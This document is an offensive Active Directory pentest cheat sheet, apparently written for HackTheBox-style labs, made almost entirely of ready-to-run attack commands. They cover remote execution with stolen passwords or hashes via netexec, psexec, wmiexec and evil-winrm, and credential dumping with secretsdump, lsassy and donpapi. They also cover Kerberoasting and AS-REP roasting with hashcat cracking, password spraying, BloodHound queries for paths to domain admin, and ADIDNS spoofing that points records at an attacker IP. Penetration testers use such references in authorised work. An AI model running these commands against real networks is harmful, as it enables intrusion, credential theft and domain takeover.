########## With Creds ########## | https://orange-cyberdefense.github.io/ocd-mindmaps/ .. code-block:: bash nxc smb RHOST -u 'USER' -p 'PASS' --shares -x whoami nxc rdp RHOST -u 'USER' -p 'PASS' nxc winrm RHOST -u 'USER' -p 'PASS' -x whoami nxc wmi RHOST -u 'USER' -p 'PASS' -x whoami nxc mssql RHOST -u 'USER' -p 'PASS' -x whoami nxc ldap RHOST -u 'USER' -p 'PASS' nxc ldap RHOST -u 'USER' -p 'PASS' -M adcs nxc smb RHOST -u 'USER' -p 'PASS' --shares -x whoami --local-auth nxc smb RHOST -u 'USER' -p 'PASS' --shares --put-file rustscan.exe /windows/temp/rustscan.exe nxc smb RHOST -u 'USER' --local-auth -H 3e1aef05e1b65e4f3cee0e60b0eba2de nxc smb RHOST -u 'Administrator' -p 'PASS' -M lsassy nxc ldap ghost.htb -u 'USER' -p 'PASS' --gmsa enum4linux RHOST -u 'USER' -p 'PASS' | .. code-block:: bash mssqlclient.py 'USER':'PASS'@RHOST -debug -windows-auth mkdir /tmp/share xfreerdp /port:3389 /v:1.2.3.4 /d:DOMAIN /u:hackerbeepboop /p:Blabliblou_1 +clipboard /cert:ignore /dynamic-resolution /drive:/tmp/share,share xfreerdp /port:3389 /v:1.2.3.4 /d:DOMAIN /u:user /pth:3e1aef05e1b65e4f3cee0e60b0eba2de +clipboard /cert:ignore /dynamic-resolution /drive:/tmp/share,share psexec.py 'domain.local'/'Administrator':'pass'@1.2.3.4 psexec.py 'Administrator':'pass'@1.2.3.4 psexec.py -hashes ":e7db1b821fac71d089d0b42d4a5bf605" Administrator@1.2.3.4 powershell.exe smbexec.py 'Administrator':'pass'@1.2.3.4 secretsdump.py Administrator:'pass'@1.2.3.4 -history secretsdump.py user@1.2.3.4 -hashes ':3e1aef05e1b65e4f3cee0e60b0eba2de' -history donpapi collect -u Administrator -p 'pass' -d domain.local -t 1.2.3.4 --fetch-pvk wmiexec.py 'user':'pass'@1.2.3.4 'powershell.exe "whoami /all"' atexec.py 'user':'pass'@1.2.3.4 whoami dcomexec.py 'user':'pass'@1.2.3.4 'whoami' dcomexec.py -object MMC20 'user':'pass'@1.2.3.4 '\\4.3.2.1\test' -nooutput # test for execution, listen on 445 first evil-winrm -i domain.com -u user -p 'pass' # Don't forget to add domain in /etc/hosts | Kerberos ******** | Getting kerberos TGT (ccache) .. code-block:: bash getTGT.py 'BOX.HTB'/'USER':'PASS' -dc-ip 'DC01.BOX.HTB' getTGT.py 'BOX.HTB'/'GMSA01' -hashes ':cfa8f6edd15de88a17a9652114e3f4a6' -dc-ip 'DC01.BOX.HTB' export KRB5CCNAME=USER.ccache | .. code-block:: bash nxc smb DC01.BOX.HTB -k --use-kcache wmiexec.py -k DC01.BOX.HTB 'powershell.exe "whoami /all"' .. code-block:: bash cat <<'EOF'>/home/user/data/krb5.conf [libdefaults] default_realm = BOX.HTB dns_canonicalize_hostname = false rdns = false [realms] BOX.HTB = { kdc = DC01.BOX.HTB admin_server = DC01.BOX.HTB } [domain_realm] BOX.HTB = BOX.HTB .BOX.HTB = BOX.HTB web.BOX.HTB = BOX.HTB EOF export KRB5_CONFIG='/home/user/data/krb5.conf' export KRB5CCNAME='/home/user/data/user.ccache' export KRB5_TRACE='/dev/stdout' .. code-block:: bash evil-winrm -i 'DC01.BOX.HTB' -r 'BOX.HTB' -u 'USER' | **************** Active Directory **************** | LDAP enumeration .. code-block:: bash ldapsearch -H 'ldap://domain.com' -D user@domain.com -w 'pass' -b "dc=domain,dc=com" "*" > /home/user/data/ldapsearch ldeep ldap -u user -p 'pass' -d domain.com -s ldaps://1.2.3.4:636 all /home/user/data/ldeep ldapdomaindump ldaps://1.2.3.4:3269 -u 'domain.com\user' -p 'pass' | | Kerberoasting .. code-block:: bash GetUserSPNs.py -dc-ip 1.2.3.10 'domain.com/user:pass' -request -outputfile /home/user/data/hashes.kerberoast hashcat -m 13100 -a 0 /home/user/data/hashes.kerberoast /usr/share/wordlists/rockyou.txt --potfile-path=/home/user/HASHCATPOT | ********** Bloodhound ********** | Install BloodHound from https://github.com/SpecterOps/BloodHound | BloodHound: v7.3.1 | Using python collector to extract infos .. code-block:: bash pipx install git+https://github.com/dirkjanm/BloodHound.py@bloodhound-ce bloodhound-ce-python --dns-tcp -u 'USER' -p 'PASS' -ns '10.129.41.25' -d 'BOX.htb' -c All,LoggedOn | | Get all descriptions, users, computers .. code-block:: bash cat *.json|jq|grep -i '"description"'| cut '-d"' -f4 | sort -u | tee /home/user/data/descriptions cat *users.json|jq|grep -i '"samaccountname"' | cut '-d"' -f4 | tee /home/user/data/users cat *computers.json|jq|grep -i '"samaccountname"' | cut '-d"' -f4 | tee /home/user/data/computers | | Enumeration .. code-block:: bash # All users group membership, excluding default low-level groups (users, everyone..) WITH ['-513', '-S-1-1-0', '-S-1-5-11', '-S-1-5-32-554', '-S-1-5-32-545'] AS usergroups MATCH p=(u:User)-[r:MemberOf*1..]->(g:Group) WHERE NOT ANY(group IN usergroups WHERE g.objectid ENDS WITH group) RETURN p # Domains and computers MATCH p1 = (d:Domain) OPTIONAL MATCH p2 = (d:Domain)-[:Contains*1..]->(c:Computer) OPTIONAL MATCH p3 = shortestPath((d:Domain)-[*1..]->(n:Domain)) WHERE d<>n WITH collect(p1) + collect(p2) + collect(p3) AS paths UNWIND paths AS path RETURN path # Users ACL MATCH p=(u:User)-[r1]->(n) WHERE r1.isacl=true RETURN p # Search for relation/activity between users and computers WITH ['-512','-544'] AS exclude MATCH p1=(d:Domain)-[:Contains*1..]->(c:Computer) OPTIONAL MATCH p2=(n)-[r:CanRDP|CanPSRemote|ExecuteDCOM|AdminTo|Owns]->(:Computer) WHERE NOT ANY(x IN exclude WHERE n.objectid ENDS WITH x) OPTIONAL MATCH p3=(:Computer)-[:HasSession]->() WITH collect(p1) + collect(p2) + collect(p3) AS paths UNWIND paths AS path RETURN path WITH ['-512','-544'] AS exclude MATCH p=(n)-[:HasSession|CanRDP|CanPSRemote|ExecuteDCOM|AdminTo*1..]->() WHERE NOT ANY(x IN exclude WHERE n.objectid ENDS WITH x) RETURN p # GPOs MATCH p1=()-[r:Owns]->(c:GPO) OPTIONAL MATCH p2=()-[:GPLink]->() WITH collect(p1) + collect(p2) AS paths UNWIND paths AS path RETURN path MATCH p1=()-[r:Owns]->(c:GPO) RETURN p1 | | Leverage Owned objects .. code-block:: bash # Owned => High value (Without CanRDP,CanPSRemote,HasSession) MATCH (m),(n),p=shortestPath((m)-[:MemberOf|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GPLink|AddAllowedToAct|AllowedToAct|WriteAccountRestrictions|SQLAdmin|ReadGMSAPassword|HasSIDHistory|SyncLAPSPassword|DumpSMSAPassword|AZMGGrantRole|AZMGAddSecret|AZMGAddOwner|AZMGAddMember|AZMGGrantAppRoles|AZNodeResourceGroup|AZWebsiteContributor|AZLogicAppContributo|AZAutomationContributor|AZAKSContributor|AZAddMembers|AZAddOwner|AZAddSecret|AZAvereContributor|AZContains|AZContributor|AZExecuteCommand|AZGetCertificates|AZGetKeys|AZGetSecrets|AZGlobalAdmin|AZHasRole|AZManagedIdentity|AZMemberOf|AZOwns|AZPrivilegedAuthAdmin|AZPrivilegedRoleAdmin|AZResetPassword|AZUserAccessAdministrator|AZAppAdmin|AZCloudAppAdmin|AZRunsAs|AZKeyVaultContributor|AZVMAdminLogin|AZVMContributor|AZLogicAppContributor|AddSelf|WriteSPN|AddKeyCredentialLink|DCSync*1..]->(n)) WHERE m<>n and COALESCE(m.system_tags, '') CONTAINS 'owned' and COALESCE(n.system_tags, '') CONTAINS 'admin_tier_0' RETURN p # Owned => Computers MATCH (m),(n:Computer),p=shortestPath((m)-[:CanRDP|CanPSRemote|MemberOf|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GPLink|AddAllowedToAct|AllowedToAct|WriteAccountRestrictions|SQLAdmin|ReadGMSAPassword|HasSIDHistory|SyncLAPSPassword|DumpSMSAPassword|AZMGGrantRole|AZMGAddSecret|AZMGAddOwner|AZMGAddMember|AZMGGrantAppRoles|AZNodeResourceGroup|AZWebsiteContributor|AZLogicAppContributo|AZAutomationContributor|AZAKSContributor|AZAddMembers|AZAddOwner|AZAddSecret|AZAvereContributor|AZContains|AZContributor|AZExecuteCommand|AZGetCertificates|AZGetKeys|AZGetSecrets|AZGlobalAdmin|AZHasRole|AZManagedIdentity|AZMemberOf|AZOwns|AZPrivilegedAuthAdmin|AZPrivilegedRoleAdmin|AZResetPassword|AZUserAccessAdministrator|AZAppAdmin|AZCloudAppAdmin|AZRunsAs|AZKeyVaultContributor|AZVMAdminLogin|AZVMContributor|AZLogicAppContributor|AddSelf|WriteSPN|AddKeyCredentialLink|DCSync*1..]->(n)) WHERE m<>n and COALESCE(m.system_tags, '') CONTAINS 'owned' OPTIONAL MATCH p2=(n:Computer)-[r:HasSession]->(m:User) WHERE COALESCE(m.system_tags, '') CONTAINS 'owned' WITH collect(p) + collect(p2) AS paths UNWIND paths AS path RETURN path | | Easy wins .. code-block:: bash # Users/Computer => High value (Without CanRDP,CanPSRemote,HasSession) MATCH (m:User),(n),p=shortestPath((m)-[:MemberOf|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GPLink|AddAllowedToAct|AllowedToAct|WriteAccountRestrictions|SQLAdmin|ReadGMSAPassword|HasSIDHistory|SyncLAPSPassword|DumpSMSAPassword|AZMGGrantRole|AZMGAddSecret|AZMGAddOwner|AZMGAddMember|AZMGGrantAppRoles|AZNodeResourceGroup|AZWebsiteContributor|AZLogicAppContributo|AZAutomationContributor|AZAKSContributor|AZAddMembers|AZAddOwner|AZAddSecret|AZAvereContributor|AZContains|AZContributor|AZExecuteCommand|AZGetCertificates|AZGetKeys|AZGetSecrets|AZGlobalAdmin|AZHasRole|AZManagedIdentity|AZMemberOf|AZOwns|AZPrivilegedAuthAdmin|AZPrivilegedRoleAdmin|AZResetPassword|AZUserAccessAdministrator|AZAppAdmin|AZCloudAppAdmin|AZRunsAs|AZKeyVaultContributor|AZVMAdminLogin|AZVMContributor|AZLogicAppContributor|AddSelf|WriteSPN|AddKeyCredentialLink|DCSync*1..]->(n)) WHERE m<>n and COALESCE(n.system_tags, '') CONTAINS 'admin_tier_0' RETURN p MATCH (m:Computer),(n),p=shortestPath((m)-[:MemberOf|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GPLink|AddAllowedToAct|AllowedToAct|WriteAccountRestrictions|SQLAdmin|ReadGMSAPassword|HasSIDHistory|SyncLAPSPassword|DumpSMSAPassword|AZMGGrantRole|AZMGAddSecret|AZMGAddOwner|AZMGAddMember|AZMGGrantAppRoles|AZNodeResourceGroup|AZWebsiteContributor|AZLogicAppContributo|AZAutomationContributor|AZAKSContributor|AZAddMembers|AZAddOwner|AZAddSecret|AZAvereContributor|AZContains|AZContributor|AZExecuteCommand|AZGetCertificates|AZGetKeys|AZGetSecrets|AZGlobalAdmin|AZHasRole|AZManagedIdentity|AZMemberOf|AZOwns|AZPrivilegedAuthAdmin|AZPrivilegedRoleAdmin|AZResetPassword|AZUserAccessAdministrator|AZAppAdmin|AZCloudAppAdmin|AZRunsAs|AZKeyVaultContributor|AZVMAdminLogin|AZVMContributor|AZLogicAppContributor|AddSelf|WriteSPN|AddKeyCredentialLink|DCSync*1..]->(n)) WHERE m<>n and COALESCE(n.system_tags, '') CONTAINS 'admin_tier_0' RETURN p # Users => Computers MATCH (m:User),(n:Computer),p=shortestPath((m)-[:CanRDP|CanPSRemote|MemberOf|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GPLink|AddAllowedToAct|AllowedToAct|WriteAccountRestrictions|SQLAdmin|ReadGMSAPassword|HasSIDHistory|SyncLAPSPassword|DumpSMSAPassword|AZMGGrantRole|AZMGAddSecret|AZMGAddOwner|AZMGAddMember|AZMGGrantAppRoles|AZNodeResourceGroup|AZWebsiteContributor|AZLogicAppContributo|AZAutomationContributor|AZAKSContributor|AZAddMembers|AZAddOwner|AZAddSecret|AZAvereContributor|AZContains|AZContributor|AZExecuteCommand|AZGetCertificates|AZGetKeys|AZGetSecrets|AZGlobalAdmin|AZHasRole|AZManagedIdentity|AZMemberOf|AZOwns|AZPrivilegedAuthAdmin|AZPrivilegedRoleAdmin|AZResetPassword|AZUserAccessAdministrator|AZAppAdmin|AZCloudAppAdmin|AZRunsAs|AZKeyVaultContributor|AZVMAdminLogin|AZVMContributor|AZLogicAppContributor|AddSelf|WriteSPN|AddKeyCredentialLink|DCSync*1..]->(n)) WHERE m<>n OPTIONAL MATCH p2=(n:Computer)-[r:HasSession]->(m:User) WITH collect(p) + collect(p2) AS paths UNWIND paths AS path RETURN path # Any unconstrained Delegation ? MATCH (c:Computer {unconstraineddelegation:true}) RETURN c # Any constrained Delegation ? MATCH p=()-[r:AllowedToDelegate|AllowedToAct]->() RETURN p MATCH (c:Computer), (t:Computer), p=((c)-[:AllowedToDelegate|AllowedToAct]->(t)) return p # kerberoast ? MATCH (n:User) WHERE n.hasspn=true RETURN n # GetUserSPNs.py -dc-ip 1.2.3.10 'do.main/user:pass' -request -outputfile /home/user/data/hashes.kerberoast # Or : nxc ldap 1.2.3.10 -d 'do.main' -u 'user' -p 'pass' --kerberoast /home/user/data/hashes.kerberoast # hashcat -m 13100 -a 0 /home/user/data/hashes.kerberoast /usr/share/wordlists/rockyou.txt --potfile-path=HASHCATPOT # preauth req ? MATCH (u:User {dontreqpreauth: true}) RETURN u # GetNPUsers.py -debug 'do.main/' -usersfile /home/user/data/users -outputfile /home/user/data/hashes.asreproast -format hashcat -dc-ip 1.2.3.10 # sudo hashcat -m 18200 /home/user/data/hashes.asreproast /usr/share/wordlists/rockyou.txt --potfile-path=HASHCATPOT # Pre-Created Computer Accounts ? (then try either blank or computer lowercase name without $ as password) MATCH p = (d:Domain)-[r:Contains*1..]->(c:Computer) WHERE c.pwdlastset = c.whencreated and c.enabled = true RETURN p MATCH p = (d:Domain)-[r:Contains*1..]->(c:Computer) WHERE c.pwdlastset < c.lastlogon - (60*60*24*45) and c.enabled = true RETURN p cat /home/user/data/computers | tr '[:upper:]' '[:lower:]' | tr -d '$' > /home/user/data/computerspass # nxc smb DC01 -u /home/user/data/computers -p /home/user/data/computerspass --continue-on-success --no-bruteforce # You can try pre2k tool as well # Ref https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts | | Others (testing) .. code-block:: bash MATCH p=()-[r:HasSession]->() RETURN p MATCH p=()-[r:Owns]->(c:Computer) RETURN p Match (n:GPO) return n MATCH p=(u:User)-[]->() RETURN p MATCH p=(u:User)-[r:GenericAll]->() RETURN p MATCH p=()-[r:GenericAll]->() RETURN p # Domain Users MATCH p=(d:Domain)-[r:Contains*1..]->(n:User) RETURN p # Map of domains/groups/users MATCH p=(d:Domain)-[r:Contains*1..]->(n:Group)<-[s:MemberOf]-(u:User) RETURN p MATCH (m),(n:OU),p=shortestPath((m)-[*1..]->(n)) where m<>n RETURN p MATCH p=()-[r:ADCSESC1|ADCSESC3|ADCSESC4|ADCSESC6a|ADCSESC6b|ADCSESC9a|ADCSESC9b|ADCSESC10a|ADCSESC10b|ADCSESC13]->() RETURN p | ****** ADIDNS ****** | https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/adidns-abuse | https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/adidns-spoofing | In order to function properly, Active Directory services need DNS. | In that matter, Active Directory Domain Services (AD-DS) offer an integrated storage and replication service for DNS records. | This is called Active Directory Integrated DNS (ADIDNS). | If the user is allowed to, he can add DNS records. .. code-block:: bash # Example using kerberos ticket export KRB5CCNAME="/home/user/data/user.ccache" python3 dnstool.py -u 'DOMAIN.HTB\user' -k "DC01.DOMAIN.HTB" --tcp -r intranet.DOMAIN.HTB -a add -d ATTACKERIP -dns-ip DNSSRVIP [-] Connecting to host... [-] Binding to host [+] Bind OK [-] Adding new record [+] LDAP operation completed successfully # Example when you don't have enought rights python3 dnstool.py -u 'DOMAIN.HTB\user' -p 'pass' 'DC01.DOMAIN.HTB' -r intranet.DOMAIN.HTB -a add -d ATTACKERIP -dns-ip DNSSRVIP [-] Connecting to host... [-] Binding to host [+] Bind OK [-] Adding new record [!] LDAP operation failed. Message returned from server: insufficientAccessRights 00000005: SecErr: DSID-03152E29, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0 | | Adding record using bloodyAD .. code-block:: bash bloodyAD --host 1.2.3.4 -d 'domain.htb' -u 'USER' -p 'PASS' add dnsRecord test 10.10.14.56 bloodyAD --host 1.2.3.4 -d 'domain.htb' -u 'USER' -p 'PASS' get dnsDump |